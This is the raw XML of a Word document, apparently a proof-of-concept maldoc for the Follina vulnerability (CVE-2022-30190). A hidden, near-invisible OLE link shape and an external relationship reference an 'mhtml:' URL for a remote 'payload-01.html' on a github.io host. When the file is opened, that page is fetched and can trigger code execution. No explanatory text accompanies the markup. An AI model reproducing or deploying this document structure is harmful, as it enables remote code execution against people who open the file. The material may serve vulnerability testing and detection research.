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5AEA9D4" w14:textId="6B56B84E" w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3" w:rsidRDefault="00511858" w:rsidP="00EE2BC3">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:pict w14:anchorId="0457A93C">
          <v:shapetype id="_x0000_m1027" coordsize="21600,21600" o:spt="100" o:preferrelative="t" adj="0,,0" path="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</w:pict>
      </w:r>
      <w:r>
        <w:pict w14:anchorId="0457A93C">
          <v:shape id="_x0000_s1026" type="#_x0000_m1027" style="width:3.75pt;height:3.75pt;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001" o:spt="100" o:preferrelative="t" o:allowoverlap="t" adj="0,,0" path="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>
          <o:OLEObject Type="Link" ProgID="https://intentagmbh.github.io/cve-2022-30190/payload-01.html" ShapeID="_x0000_s1026" DrawAspect="Content" r:id="rId4" UpdateMode="OnCall">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA49F2" w:rsidRPr="00EE2BC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D13CF"/>
    <w:rsid w:val="00511858"/>
    <w:rsid w:val="00803FB9"/>
    <w:rsid w:val="00C23139"/>
    <w:rsid w:val="00CD13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  <w14:docId w14:val="58D0D4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oleObject" Target="mhtml:https://intentagmbh.github.io/cve-2022-30190/payload-01.html!x-usc:https://intentagmbh.github.io/cve-2022-30190/payload-01.html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payload-01.dotx</Template>
  <TotalTime>0</TotalTime>
  <Pages>1</Pages>
  <Words>4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Enrico Gurks</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Enrico Gurks</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-02T19:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-02T19:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>